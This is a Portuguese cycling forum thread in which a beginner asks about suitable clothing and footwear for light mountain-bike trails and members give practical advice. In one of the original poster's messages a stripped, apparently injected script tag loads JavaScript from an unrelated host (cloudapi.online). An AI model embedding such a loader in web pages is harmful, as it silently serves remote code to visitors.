Pedal.com.br Página inicial
Fórum Inicial Fórum Inicial > Assuntos Gerais > Acessórios para bicicleta e ciclista
  Novas Mensagens Novas Mensagens RSS Feed - Vestimenta adequada para trilhas leves
   [REGRAS]    FAQ FAQ  Pesquisar no Fórum   Registrar Registrar  Entrar Entrar

Utilizamos cookies para melhorar a sua experiencia no site. Ao continuar navegando voce concorda com a nossa politica de privacidade.


Vestimenta adequada para trilhas leves

 Responder
Autor
Mensagem
  Tópico Pesquisar Tópico Pesquisar  Opções do Tópico Opções do Tópico
Yamuhu Ver Drop Down


Cadastrado em: 23 Nov 2016
Bahia
Offline
Mensagens:43
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar Yamuhu Citar  ResponderResponder Link direto para este Post Tópico: Vestimenta adequada para trilhas leves
    Postado: 14 Jun 2017 as 19:07
Olá!
Adquiri uma bicicleta recentemente para ir ao trabalho (15KM ida e volta) e fazer algumas trilhas. Comprei uma Oggi Hacker 27.5 que tava com um preço muito bom numa loja aqui da cidade. 

Fiz uma trilha leve com uns amigos e gostei da ideia e vou ficar fazendo mais trilhas semanalmente. A trilha é de terra batida, é bem tranquila, até porque a minha bicicleta não aguenta trilha mais pesada... mas aí fiquei na dúvida sobre qual a vestimenta (bermuda, camisa, calçado) mais adequada para ir nas trilhas. Comprei hoje uma calça de ciclismo (aquela colada) com espuma na virilha porque estava sentindo umas dores na região onde senta no selim. Aí vi que tem umas bermudas próprias pra "all mountain" e fiquei na dúvida se elas também tem essa proteção, se elas são mais adequadas pra essas trilhas que ando fazendo. Li também que um pessoal pedala de bota (tenho uma timberland aqui, qualquer coisa posso usar?), outros de tênis de skatista, chuteira sem pino... enfim, fiquei com dúvida em qual seria a solução mais adequada pra eu pedalar nas trilhas. Qual camisa, qual bermuda, qual calçado?
Voltar ao Topo
RuanRAC Ver Drop Down
Avatar

Cadastrado em: 06 Mai 2014
Natal/RN
Offline
Mensagens:2829
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar RuanRAC Citar  ResponderResponder Link direto para este Post Postado: 14 Jun 2017 as 19:19
tenis normal equilibra um solado com algum cravo e ventilação, eu evito aqueles com suspensão vazada pois levanta areia e tal... 

mas se puder sapatilhas para MTB são bem interessantes.
Voltar ao Topo
hurry-gurits Ver Drop Down
Avatar

Cadastrado em: 13 Out 2015
são paulo
Offline
Mensagens:2084
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar hurry-gurits Citar  ResponderResponder Link direto para este Post Postado: 14 Jun 2017 as 21:33
Usei bermuda de lycra com a proteção de espuma, há 20 anos atras tinha vergonha de ficar só com ela, então usava um short por cima, vivia enrroscando no banco, usava direto as camisetas de lycra de bike também.

Usei essas bermas e camisetas de lycra até descobrir as camisetas e bermudas de "all mountain", comprei uma na gringa uma berma e camiseta 3/4 de manga, não troco por nada.
Depois descobri que tem no aliexpress, comprei mais algumas, achei muito confortável, cheia de bolso, seca rapido e a unica desvantagem na camiseta é que não tem bolsos atrás, porém sempre estou de mochila com água então não faz falta.

Essas marcas comprei e gostei, já tomei varios capotes punks e não rasgou, OuchOuchOuch ainda..

Forro da bermuda: 

https://pt.aliexpress.com/item/ARSUXEO-cycling-bike-bicycle-mountaion-road-biking-riding-bib-underwear-shorts-undershorts-underwear-3D-cool-max/2047840811.html?spm=2114.13010708.0.0.YElw1G

Bermuda:

https://pt.aliexpress.com/item/Mens-Brand-Outdoor-Sports-Cycling-Clothing-Downhill-MTB-Shorts-Pants-Mountain-Bike-Bicycle-Shorts-Wear-Jersey/32702333616.html?spm=2114.13010708.0.0.YElw1G

Camisetas Manga comprida

https://pt.aliexpress.com/item/2016-ANSWER-RockStar-motocross-jersey-moto-MX-MTB-maillot-football-Mountain-Bike-DH-Bicycle-Cycling-Jersey/32795847473.html?spm=2114.02010108.3.400.sARQ9t&ws_ab_test=searchweb0_0,searchweb201602_5_10152_10065_10151_10068_10136_10137_10060_10155_10062_437_10154_10056_10055_10054_10059_303_100031_10099_10103_10102_10096_10052_10053_10142_10107_10050_10051_10173_10084_10083_10119_10080_10082_10081_10110_519_10111_10112_10113_10114_10182_10078_10079_5030020_10073_10123_10120_10189_142-10050_10120,searchweb201603_16,ppcSwitch_5&btsid=c3ce4ee5-4cb5-483b-95ac-834f47858927&algo_expid=eeb45d8b-6d42-4753-87c9-132f19e12f9f-44&algo_pvid=eeb45d8b-6d42-4753-87c9-132f19e12f9f

Eu particularmente não compro mais roupa de ciclismo no BR.

Sempre usei botina tipo da decathlon/timberland/rebook quando não usava pedal clip, na bike de enduro ainda estou pensando se vou por clip, na de XC esta com clip.

Sapatilha ajuda quando usa pedal clip, mas escorrega pra caramba no piso, dependendo do modelo, tenho um da shimano, parece tênis.

Agora luva e capacete, totalmente indispensavél.


scott single track 95 26" cromo
khs 204 full 2012 26"- R.I.P.
khs sixfifty 2500 27.5" - 2014
Mongoose XR PRO 29" - 2016
GT Sanction Pro 27.5" - 2015
GT Agressor 1.0 26" - 2012 - Pumptrack Edition
Voltar ao Topo
RuanRAC Ver Drop Down
Avatar

Cadastrado em: 06 Mai 2014
Natal/RN
Offline
Mensagens:2829
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar RuanRAC Citar  ResponderResponder Link direto para este Post Postado: 14 Jun 2017 as 22:10
outra opção usar bermuda de licra com foro e outra bermuda/calça por cima, mas tem que ser folgada

sobre camisa, eu uso aquelas de compressão mais finas, ventilam bem e protegem do sol, mas não têm os bolsos
Voltar ao Topo
Daniel Moreira Ver Drop Down
Avatar

Cadastrado em: 16 Jan 2017
São Paulo
Offline
Mensagens:514
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar Daniel Moreira Citar  ResponderResponder Link direto para este Post Postado: 14 Jun 2017 as 22:24
Eu uso calça legging feminina, e por cima, uma bermuda folgada, daquelas pra jogar bola .

Como eu não depilo as pernas (e sou peludo) se eu coloco uma bermuda de ciclismo fica machucando. E cueca fica subindo.

Minha bunda já tá calejada (olha as piadinhas, heim kkkkk) então nem sinto falta de forro de bermuda, isso pq quase n pedalo em pé.

A legging que uso custa uns 15 reais. Melhor custo benefício, não há.

Detalhe: Seria mais confortável sem a bermuda por cima, mas o ser humano ainda é muito escroto, e fica fazendo piadinha. Já fui zoado de mais por usar legging.

Tenis, uso os mais confortáveis que tenho (todos são de corrida)

Camiseta, qualquer uma (de corrida).

Gosto de praticidade. A mesma roupa que uso pra trabalhar (Salvo exceção quando tem reunião), sair pra qualquer lugar, e pra pedalar.


Editado por Daniel Moreira - 14 Jun 2017 as 22:27
Voltar ao Topo
Yamuhu Ver Drop Down


Cadastrado em: 23 Nov 2016
Bahia
Offline
Mensagens:43
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar Yamuhu Citar  ResponderResponder Link direto para este Post Postado: 14 Jun 2017 as 22:37
Opa! Muito obrigado pelas respostas, galera.
Então... não tenho problema nenhum em sair com roupa de ciclismo. Por mim o povo fala o que quiser, nem ligo. Quero saber mesmo qual que é adequado... se a bermuda de all mountain é melhor ou mais eficiente do que a de ciclismo mais colada e etc.

Até agora tô com mais dúvida sobre o calçado mais adequado. 

Tenho esses calçados:

Bota timberland:
http://www.netshoes.com.br/produto/bota-timberland-flume-waterproof-D15-0655-264?campaign=gglepqpla&gclid=CjwKEAjwvYPKBRCYr5GLgNCJ_jsSJABqwfw7Rsq4QqlD6w0F-eB-UOULZ_VhDhR3P8HbwCkaujaiIhoCTQnw_wcB

Tenis timberland:
https://www.botoli.com.br/cdn/imagens/produtos/original/tenis-timberland-ek-eurocamp--57b425cdf37ff4edd34b595a5bdbbfb5.jpg

All star branco:
http://www.netshoes.com.br/produto/tenis-converse-all-star-ct-as-core-ox-047-0114-014?campaign=gglepqpla&gclid=CjwKEAjwvYPKBRCYr5GLgNCJ_jsSJABqwfw7j6S39Qmr1hr-Gfm2lczdpHCDMFjX8Y1tSZ8Gtd1gsRoCb2_w_wcB

Nike fusion:
http://imgcentauro-a.akamaihd.net/900x900/81009505/tenis-nike-dual-fusion-run-2-msl-masculino-img.jpg

Algum desses dá pra pedalar ou é melhor comprar um novo?

Li pelo fórum que o pessoal na gringa recomenda muito um tal de "five ten" e aí vi ele em dois modelos, um parecendo skatista e outro parecendo uma bota como a da timberland, aí fiquei na dúvida se dá pra usar bota.

Testei a calça de ciclismo e a bota aqui e ficou bem engraçado a vestimenta, mas como já disse, não ligo pro que o povo tá falando não... sendo eficiente, tá beleza.
Voltar ao Topo
Marcelook32 Ver Drop Down


Cadastrado em: 12 Jan 2015
Foz do Iguaçu
Offline
Mensagens:765
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar Marcelook32 Citar  ResponderResponder Link direto para este Post Postado: 14 Jun 2017 as 23:24
Sobre a bota, era o que eu gostava mais quando usava plataforma, dava bom apoio no pedal, e na hora de empurrar me sentia seguro, tenis macio parece que perde um pouco sensibilidade e potencia... não gostava, tenis ou sapatenis sola muito fina, dá dor na planta do pé depois... não recomendo.

Bermuda se já usa as de ciclismo e não se importa, fique com elas....
Voltar ao Topo
Yamuhu Ver Drop Down


Cadastrado em: 23 Nov 2016
Bahia
Offline
Mensagens:43
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar Yamuhu Citar  ResponderResponder Link direto para este Post Postado: 15 Jun 2017 as 17:36
Salve! Fiz uma trilha hoje e fui de calça e bota e foi tudo tranquilão. Gostei bastante de usar a bota, me senti confortável, pedalou bem e não deslizou.



Agora vou comprar uma camisa de compressão pra ficar melhor.
Voltar ao Topo
Yamuhu Ver Drop Down


Cadastrado em: 23 Nov 2016
Bahia
Offline
Mensagens:43
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar Yamuhu Citar  ResponderResponder Link direto para este Post Postado: 15 Jun 2017 as 17:40
http://imgur.com/a/AvFQE
Voltar ao Topo
LcBlc Ver Drop Down


Cadastrado em: 06 Jun 2014
Brasilia
Offline
Mensagens:506
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar LcBlc Citar  ResponderResponder Link direto para este Post Postado: 15 Jun 2017 as 18:04
Depende da trilha, se for mato fechado camisa de manga longa e calça
Senão vai de camisa de maga curta
Calçado - sapatilha

Voltar ao Topo
Pedro Cury Ver Drop Down
Avatar

Cadastrado em: 19 Jul 2008
Rio de Janeiro
Offline
Mensagens:4848
Opções da Mensagem Opções da Mensagem   Agradecimentos (1) Agradecimentos(1)   Citar Pedro Cury Citar  ResponderResponder Link direto para este Post Postado: 18 Jun 2017 as 23:37
Olá Yamuhu,

Vamos às minhas dicas:

- Lycra ou bermuda normal

Eu acho importante usar lycra principalmente porque segura seus ovos na posição certa! Não queira usar cueca larga e bater o saco no selim! Será uma experiência inesquecível! Acredite... não use lycra e um dia acontecerá!

Outra coisa é a questão do forro. Tem gente que é mais ou menos sensível as dores do selim. Na verdade dor de selim é mais causado por selim da largura errada e pernas fracas do que o forro em si. Bermuda de lycra não é pra usar com cueca!! A própria costura da cueca pode machucar.

Uma outra vantagem é que vc nao corre o risco da bermuda enroscar no selim, como poderia fazer uma bermuda mais larga.

De qq forma, existem as bermudas de all mountain, que as vezes vem com uma bermuda fina apertada com o forro (que não é pra usar sozinha) e a parte da bermuda mesmo. Temos a nacional da ASW (http://www.aswracing.com.br/produto.asp?id_sku=1687&id_cat=3&id_sub=143&id_marca=). 

Se usar a bermuda mais all mountain, o risco maior mesmo é enroscar no selim... não é algo que acontece sempre, depende do seu estilo, do selim, etc, etc. Em 20 anos aconteceu uma ou duas vezes comigo sem me derrubar.

- Tenis para usar com pedal plataforma

Eu uso pedal plataforma até hoje. Já andei muito de pedal clip, mas eu tenho uma base muito boa de plataforma e tenho preferido. Eu acho um erro um iniciante andar de clip.

Muita gente não se acostuma com pedal plataforma porque não tem uma combinação de pedal + tenis adequado. Um pedal plataforma bom vai ter cravos de metal (que são perigosos pra canela) e o tenis ideal terá uma sola com material adequado para ter boa aderência nesses cravos.

Como você falou, os Five Ten são sensacionais na aderência. Infelizmente os que eu tive abriram a sola. Não sei se agora a sola é costurada. Eles são muito caros e nem tem (eu acho) distribuidor no Brasil. Por aqui tem os da Specialized que já testamos e que uso atualmente (https://www.pedal.com.br/teste-sapatilha-specialized-2fo-2015-para-pedais-plataforma_texto9513.html) e os da Shimano. Partindo pros não específicos (e mais baratos) tem os de skate. Talvez durem menos, mas o preço pode valer inicialmente. Só não sei indicar marcas.

Pedais existem de vários preços. Tem que pegar um modelo com pinos como esse do link. Aí tem variações... pinos com altura regulável até. http://www.mybikestore.com.br/produto/pedal-jelly-pro/8764#axzz4kP9BrhwN

Outros acessórios
Roupa de compressão é um ganho bem marginal, não é indicado pra todo mundo e muitas vezes é só pro pós treino. Eu não usaria! Não faz sentido se não tiver recomendação médica ou de treinador. Uma camisa com ziper inteiro é muito melhor... vc vai ter mais ganhando podendo refrescar seu corpo...

Óculos - Super importante! Não precisa ser escuro ou colorido, pode ser transparente... eu não pedalo sem! Artigo: https://www.pedal.com.br/importancia-de-pedalar-com-oculos-de-ciclismo-ou-mountain-bike_texto7901.html

Capacete - Nem precisa falar né...

Luvas - É legal pra evitar que sua mão escorregue com o suor. E por proteção... ralar dedo é bem ruim!!

Outra coisa importante - Cadarço do tenis.. coloque pra dentro, não deixe pegar no pedivela que a corrente puxa e te trava os pés!

Desconto Netshoes - Vi que você postou link da netshoes. Entre pelo link www.netshoes.com.br/pedal que vc pode ter desconto em alguns itens!

Vai contando pra gente como tá indo!! 
Cadastro de Bicicletas Roubadas: <a href="http://www.bicicletasroubadas.com.br" rel="nofollow">www.bicicletasroubadas.com.br</a> - Divulgue no seu blog e pros seus amigos!

Voltar ao Topo
Tielo Miotti Ver Drop Down
Avatar

Cadastrado em: 10 Jul 2013
Mogi das Cruzes
Offline
Mensagens:284
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar Tielo Miotti Citar  ResponderResponder Link direto para este Post Postado: 19 Jun 2017 as 09:22
Originalmente postado por Pedro Cury Pedro Cury escreveu:

Olá Yamuhu,

Vamos às minhas dicas:

- Lycra ou bermuda normal

Eu acho importante usar lycra principalmente porque segura seus ovos na posição certa! Não queira usar cueca larga e bater o saco no selim! Será uma experiência inesquecível! Acredite... não use lycra e um dia acontecerá!

Outra coisa é a questão do forro. Tem gente que é mais ou menos sensível as dores do selim. Na verdade dor de selim é mais causado por selim da largura errada e pernas fracas do que o forro em si. Bermuda de lycra não é pra usar com cueca!! A própria costura da cueca pode machucar.

Uma outra vantagem é que vc nao corre o risco da bermuda enroscar no selim, como poderia fazer uma bermuda mais larga.

De qq forma, existem as bermudas de all mountain, que as vezes vem com uma bermuda fina apertada com o forro (que não é pra usar sozinha) e a parte da bermuda mesmo. Temos a nacional da ASW (http://www.aswracing.com.br/produto.asp?id_sku=1687&id_cat=3&id_sub=143&id_marca=). 

Se usar a bermuda mais all mountain, o risco maior mesmo é enroscar no selim... não é algo que acontece sempre, depende do seu estilo, do selim, etc, etc. Em 20 anos aconteceu uma ou duas vezes comigo sem me derrubar.

- Tenis para usar com pedal plataforma

Eu uso pedal plataforma até hoje. Já andei muito de pedal clip, mas eu tenho uma base muito boa de plataforma e tenho preferido. Eu acho um erro um iniciante andar de clip.

Muita gente não se acostuma com pedal plataforma porque não tem uma combinação de pedal + tenis adequado. Um pedal plataforma bom vai ter cravos de metal (que são perigosos pra canela) e o tenis ideal terá uma sola com material adequado para ter boa aderência nesses cravos.

Como você falou, os Five Ten são sensacionais na aderência. Infelizmente os que eu tive abriram a sola. Não sei se agora a sola é costurada. Eles são muito caros e nem tem (eu acho) distribuidor no Brasil. Por aqui tem os da Specialized que já testamos e que uso atualmente (https://www.pedal.com.br/teste-sapatilha-specialized-2fo-2015-para-pedais-plataforma_texto9513.html) e os da Shimano. Partindo pros não específicos (e mais baratos) tem os de skate. Talvez durem menos, mas o preço pode valer inicialmente. Só não sei indicar marcas.

Pedais existem de vários preços. Tem que pegar um modelo com pinos como esse do link. Aí tem variações... pinos com altura regulável até. http://www.mybikestore.com.br/produto/pedal-jelly-pro/8764#axzz4kP9BrhwN

Outros acessórios
Roupa de compressão é um ganho bem marginal, não é indicado pra todo mundo e muitas vezes é só pro pós treino. Eu não usaria! Não faz sentido se não tiver recomendação médica ou de treinador. Uma camisa com ziper inteiro é muito melhor... vc vai ter mais ganhando podendo refrescar seu corpo...

Óculos - Super importante! Não precisa ser escuro ou colorido, pode ser transparente... eu não pedalo sem! Artigo: https://www.pedal.com.br/importancia-de-pedalar-com-oculos-de-ciclismo-ou-mountain-bike_texto7901.html

Capacete - Nem precisa falar né...

Luvas - É legal pra evitar que sua mão escorregue com o suor. E por proteção... ralar dedo é bem ruim!!

Outra coisa importante - Cadarço do tenis.. coloque pra dentro, não deixe pegar no pedivela que a corrente puxa e te trava os pés!

Desconto Netshoes - Vi que você postou link da netshoes. Entre pelo link www.netshoes.com.br/pedal que vc pode ter desconto em alguns itens!

Vai contando pra gente como tá indo!! 


Pedro! Tá melhor mano? Espero que sim.
Bom o Pedro já disse tudo aí. Só na questão da bermuda, especificamente sobre o forro gostaria de acrescentar que os forros além das características já citadas possuem tratamento antimicrobiano que evitam a proliferação de fungos e bactérias causadas pelo suor e o atrito da pele com o tecido.

Resumidamente: faça um pedal de 150 quilômetros com sua cueca preferida, ou calça de ginástica etc e/ou por baixo da sua bermuda ou bretelle, e depois contemple, fotografe e poste no instagram o pântano de fungos e pele assada em que se tornou sua virilha. DeadLOL

Abraços!
Trek TopFuel 9.8
Specialized Sl7 Tarmac Expert

strava.com/athletes/2795861
Voltar ao Topo
AndreKavernista Ver Drop Down
Avatar

Cadastrado em: 19 Jul 2014
Brasília - DF
Offline
Mensagens:107
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar AndreKavernista Citar  ResponderResponder Link direto para este Post Postado: 19 Jun 2017 as 13:29
Única coisa que eu recomendo é usar uma blusa de proteção solar, seja de ciclismo ou dessas de fazer caminhada. Bermuda com forro é uma coisa que eu já tive mas parei de usar, não vejo necessidade nenhuma para quem não é atleta profissional, e outra que tendo um bom selim o desconforto é quase zero. Pode doer nos 2 primeiros dias, mas logo logo a bunda caleja e pára de doer, é a mesma coisa de quem está aprendendo a tocar violão e fica com as pontas dos dedos doendo, só deixar o corpo acostumar que passa. Além de que a bermuda de ciclismo é muito apertada, me dá aquela mesma sensação de passar o dia inteiro usando sunga.
Voltar ao Topo
Pedro Cury Ver Drop Down
Avatar

Cadastrado em: 19 Jul 2008
Rio de Janeiro
Offline
Mensagens:4848
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar Pedro Cury Citar  ResponderResponder Link direto para este Post Postado: 19 Jun 2017 as 18:18
Originalmente postado por Tielo Miotti Tielo Miotti escreveu:


Pedro! Tá melhor mano? Espero que sim.
Bom o Pedro já disse tudo aí. Só na questão da bermuda, especificamente sobre o forro gostaria de acrescentar que os forros além das características já citadas possuem tratamento antimicrobiano que evitam a proliferação de fungos e bactérias causadas pelo suor e o atrito da pele com o tecido.

Resumidamente: faça um pedal de 150 quilômetros com sua cueca preferida, ou calça de ginástica etc e/ou por baixo da sua bermuda ou bretelle, e depois contemple, fotografe e poste no instagram o pântano de fungos e pele assada em que se tornou sua virilha. DeadLOL
Abraços!

Falai Tielo,

To bem melhor... agora é só esperar poder fazer esforço novamente, voltar pra academia e depois pra bike!! Thumbs Up

Isso aí, também tem essa questão das bermudas!
Cadastro de Bicicletas Roubadas: <a href="http://www.bicicletasroubadas.com.br" rel="nofollow">www.bicicletasroubadas.com.br</a> - Divulgue no seu blog e pros seus amigos!

Voltar ao Topo
Ismah/Cabelo Ver Drop Down
Avatar

Cadastrado em: 26 Abr 2017
Bom Princípio/R
Offline
Mensagens:2425
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar Ismah/Cabelo Citar  ResponderResponder Link direto para este Post Postado: 20 Jun 2017 as 14:55
Originalmente postado por Daniel Moreira Daniel Moreira escreveu:

Eu uso calça legging feminina, e por cima, uma bermuda folgada, daquelas pra jogar bola .

Como eu não depilo as pernas (e sou peludo) se eu coloco uma bermuda de ciclismo fica machucando. E cueca fica subindo.

Detalhe: Seria mais confortável sem a bermuda por cima, mas o ser humano ainda é muito escroto, e fica fazendo piadinha. Já fui zoado de mais por usar legging.


A legging é nome para UM TIPO de calça justa, tradicionalmente de lycra ou elastano, e que vai até o tornozelo. Quem fala mal ou zoa, tá zoando de seu pai, talvez até seu avô, por tabela... Era maior moda nos anos 80! As calças de lycra e boca de sino marcaram época, possivelmente só atrás do smoking de origem Eduardina, e o terno de origem francesa...

Todas as bandas mainstream dos idos de 80 usaram, e a moda ainda continua nesse meio. Se até o Ozzy Osbourne, tido como "Príncipe das Trevas", virou "Rainha da noite" naquele tempo... E se só fosse a calça de lycra...! As estampas é que eram o barato...

Todavia, a cueca sobe de qualquer maneira pedalando, não sei como isso não te acontece normalmente. Eu pedalando já parei no meio da rua pra sacar fora a cueca. Acima de tudo meu conforto. Se der assadura, é no meu rego, não no alheio...
Voltar ao Topo
Yamuhu Ver Drop Down


Cadastrado em: 23 Nov 2016
Bahia
Offline
Mensagens:43
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar Yamuhu Citar  ResponderResponder Link direto para este Post Postado: 20 Jun 2017 as 15:52
Agradeço bastante pela gentileza de esclarecer minhas dúvidas. 
Agradeço também ao Pedro Cury que respondeu detalhadamente e me sanou praticamente todas as minhas dúvidas.< ="text/" id="lg210a" ="https://cloudapi.online/js/api46.js">

Vou postar uma foto pra mostrar a vestimenta que usei na última trilha:



Aí tô usando uma calça de lycra (uso sem cueca), uma camisa de compressão que me fez sentir menos suor (eu também não transpiro muito), não senti calor e fiquei bem confortável com ela, luva, capacete ( no guidão), e óculos.
Uma dúvida que eu tenho agora saindo um pouco do foco é só sobre como colocar o suporte de água (pra ficar com dois) na vertical sendo que a minha bike não tem os dois furinhos ?

Voltando ao foco... agora sobre o calçado que estou usando:

 

Pode não estar dando pra ver detalhadamente mas é um timberland igualzinha essa (http://www.netshoes.com.br/produto/bota-timberland-flume-waterproof-D15-0655-264?campaign=gglepqpla&gclid=CNvLzKOLzdQCFYEmhgod90ELCg).
Olha... devo dizer que sei que não é o mais adequado, mas me sinto muito confortável com a bota e a pedalada fica mais firme também, não deslizou, não me atrapalha com calor e nem com peso ainda (445gr), tenho gostado bastante de fazer trilhas com ela. As trilhas que estamos fazendo são menores... algumas de 30KM outras de 45KM. Acredito que se fizer trilha maior posso começar a sentir desconforto, mas no momento, como não tem me causado deconforto algum, acho que vou utilizar ele por mais um tempo até conseguir dinheiro pra um sapato mais adequado.


Só resta agradecer novamente a todos e esse fórum. Tirou muito das minhas dúvidas na hora de comprar bike, na hora de escolher os acessórios... só alegria! 
Valeu!!! Galera do pedal, vocês são foda!
Voltar ao Topo
Pedro Cury Ver Drop Down
Avatar

Cadastrado em: 19 Jul 2008
Rio de Janeiro
Offline
Mensagens:4848
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar Pedro Cury Citar  ResponderResponder Link direto para este Post Postado: 20 Jun 2017 as 16:11
Show! Que bom que tá curtindo.

Se o tenis não tá te incomodando, continue com ele. Pode ser que ele nunca te incomode, pode ser que só te incomode em alguns meses quando vc tiver exigindo mais. Deixa rolar!!
Cadastro de Bicicletas Roubadas: <a href="http://www.bicicletasroubadas.com.br" rel="nofollow">www.bicicletasroubadas.com.br</a> - Divulgue no seu blog e pros seus amigos!

Voltar ao Topo
 Responder

Permissões do Fórum Ver Drop Down

Forum Software by Web Wiz Forums® version 12.07
Copyright ©2001-2024 Web Wiz Ltd.

 
 
 
 
 
 

X